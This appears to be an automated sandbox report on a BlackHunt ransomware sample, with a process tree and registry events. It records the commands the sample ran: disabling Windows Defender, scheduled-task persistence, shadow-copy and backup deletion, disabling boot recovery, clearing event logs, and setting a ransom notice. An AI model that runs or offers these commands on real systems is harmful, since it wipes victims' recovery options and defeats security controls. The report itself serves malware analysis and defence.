3120 wrote to memory of 2404 3120 cmd.exe 107 PID 3120 wrote to memory of 2404 3120 cmd.exe 107 PID 1448 wrote to memory of 1124 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 109 PID 1448 wrote to memory of 1124 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 109 PID 4764 wrote to memory of 3740 4764 cmd.exe 111 PID 4764 wrote to memory of 3740 4764 cmd.exe 111 PID 1448 wrote to memory of 4816 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 113 PID 1448 wrote to memory of 4816 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 113 PID 4888 wrote to memory of 2852 4888 cmd.exe 115 PID 4888 wrote to memory of 2852 4888 cmd.exe 115 PID 1448 wrote to memory of 1744 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 114 PID 1448 wrote to memory of 1744 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 114 PID 3420 wrote to memory of 4272 3420 cmd.exe 117 PID 3420 wrote to memory of 4272 3420 cmd.exe 117 PID 1124 wrote to memory of 3276 1124 cmd.exe 124 PID 1124 wrote to memory of 3276 1124 cmd.exe 124 PID 1448 wrote to memory of 3304 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 120 PID 1448 wrote to memory of 3304 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 120 PID 1448 wrote to memory of 4452 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 121 PID 1448 wrote to memory of 4452 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 121 PID 1448 wrote to memory of 4544 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 126 PID 1448 wrote to memory of 4544 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 126 PID 4816 wrote to memory of 4760 4816 cmd.exe 127 PID 4816 wrote to memory of 4760 4816 cmd.exe 127 PID 1744 wrote to memory of 3124 1744 cmd.exe 129 PID 1744 wrote to memory of 3124 1744 cmd.exe 129 PID 1448 wrote to memory of 4776 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 204 PID 1448 wrote to memory of 4776 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 204 PID 3304 wrote to memory of 4932 3304 cmd.exe 202 PID 3304 wrote to memory of 4932 3304 cmd.exe 202 PID 1448 wrote to memory of 3652 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 142 PID 1448 wrote to memory of 3652 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 142 PID 4452 wrote to memory of 4444 4452 cmd.exe 130 PID 4452 wrote to memory of 4444 4452 cmd.exe 130 PID 1448 wrote to memory of 2612 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 140 PID 1448 wrote to memory of 2612 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 140 PID 1448 wrote to memory of 3896 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 131 PID 1448 wrote to memory of 3896 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 131 PID 4544 wrote to memory of 4008 4544 cmd.exe 132 PID 4544 wrote to memory of 4008 4544 cmd.exe 132 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe"C:\Users\Admin\AppData\Local\Temp\13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1448 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:4820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:3300
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3420 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4888
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3896
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4968
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1748
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2612
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:184
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1084
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:5536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2452
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:11244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1432
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:6864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe" /F2⤵PID:3004
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:2888
-
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe" /F3⤵
- Creates scheduled task(s)
PID:8548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3700
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1112
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:10908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1352
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:7836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1940
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:4928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2236
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1812
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3944
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:8152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3144
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4988
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:10096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3036
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:7768
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:12016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:8024
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:11952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:8076
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:11968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:17820
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:17464
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:11448
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:6588
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:11804
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:11776
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:9136
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:6604
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:8072
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:9916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:9632
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:6536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:10168
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:10060
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:13064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:9980
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:6712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:9956
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:5892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:10388
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:10420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2740
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:11096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:10004
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:9444
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:11024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:8708 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:4052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 14484⤵
- Program crash
PID:14324
-
-
